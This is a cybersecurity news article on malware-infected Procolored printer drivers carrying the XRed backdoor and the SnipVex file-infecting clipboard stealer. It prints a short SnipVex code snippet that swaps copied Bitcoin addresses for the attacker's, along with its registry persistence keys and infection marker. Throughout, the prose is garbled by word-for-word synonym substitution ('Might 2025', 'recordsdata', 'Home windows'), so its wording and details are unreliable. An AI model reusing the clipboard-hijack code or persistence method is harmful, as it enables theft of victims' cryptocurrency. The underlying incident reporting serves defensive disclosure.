In a regarding cybersecurity incident, printer producer Procolored unknowingly distributed malware-infected software program for roughly six months, ending in Might 2025.
The problem got here to mild when YouTube creator Cameron Coward of the channel Serial Hobbyism tried to assessment a $6,000 UV printer and was alerted by his antivirus software program to infections on the company-provided USB drive.
What initially appeared as potential false positives was subsequently confirmed to be professional malware-a refined mixture of a backdoor and a cryptocurrency-stealing virus.
The contaminated software program packages, accessible for obtain from Procolored’s web site through mega.nz hyperlinks, contained malicious code affecting six printer merchandise: F8, F13, F13 Professional, V6, V11 Professional, and VF13 Professional.
When customers put in the drivers, their methods grew to become contaminated with two distinct malware strains: Win32.Backdoor.XRedRAT.A and MSIL.Trojan-Stealer.CoinStealer.H (known as SnipVex).
The infections affected a complete of 39 recordsdata throughout the assorted software program packages, with 20 distinctive file hashes recognized.
G DATA safety researchers recognized that the XRed backdoor part had beforehand been documented in February 2024, indicating this was not a brand new risk however somewhat an older malware pressure that had discovered its method into Procolored’s provide chain.
Evaluation revealed the backdoor contained the very same command and management URLs as variants analyzed earlier, regardless that these servers had already gone offline earlier than this incident gained consideration.
The affect of those infections prolonged past mere knowledge safety issues. Blockchain evaluation confirmed that the attackers’ Bitcoin tackle acquired roughly 9.3 BTC-equivalent to roughly $100,000-likely from hijacked cryptocurrency transactions.
Regardless of the command and management infrastructure being inactive since February 2024, limiting the backdoor’s performance, the file-infecting capabilities of SnipVex continued to pose vital dangers to affected methods.
An infection Mechanism of SnipVex
The SnipVex part employed a classy file an infection technique, working as a basic prepending virus.
Payload of SnipVex consists solely of eight strains (Supply – G DATA)
When analyzing the PrintExp.exe pattern (SHA256: 531d08606455898408672d88513b8a1ac284fdf1fe011019770801b7b46d5434), researchers discovered that the malware prepended itself to professional executable recordsdata.
The virus’s an infection routine was elegantly easy but efficient. It first checked goal recordsdata for an an infection marker-specifically the byte sequence 0x0A 0x0B 0x0C within the ultimate three bytes-to keep away from superinfection.
An infection routine of SnipVex (Supply – G DATA)
It then selectively averted infecting recordsdata in %TEMP% or %APPDATA% directories, in addition to any recordsdata beginning with a dot.
// SnipVex clipboard monitoring code
// Searches for Bitcoin tackle patterns and replaces them
if (Regex.IsMatch(clipboardText, “[13][a-km-zA-HJ-NP-Z1-9]{25,34}”))
{
Clipboard.SetText(“1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj”);
}
To propagate, SnipVex monitored all logical drives for any adjustments to recordsdata with “.exe” extensions, making a persistent an infection vector throughout linked methods.
The virus established persistence by way of Home windows Registry run keys (HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunScdBcd and HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunClpBtcn), guaranteeing it remained energetic throughout system reboots.
Procolored has since eliminated all contaminated software program from their web site and issued remediation steerage to affected prospects, promising improved safety measures for future software program distributions.
How SOC Groups Save Time and Effort with ANY.RUN – Dwell webinar for SOC groups and managers
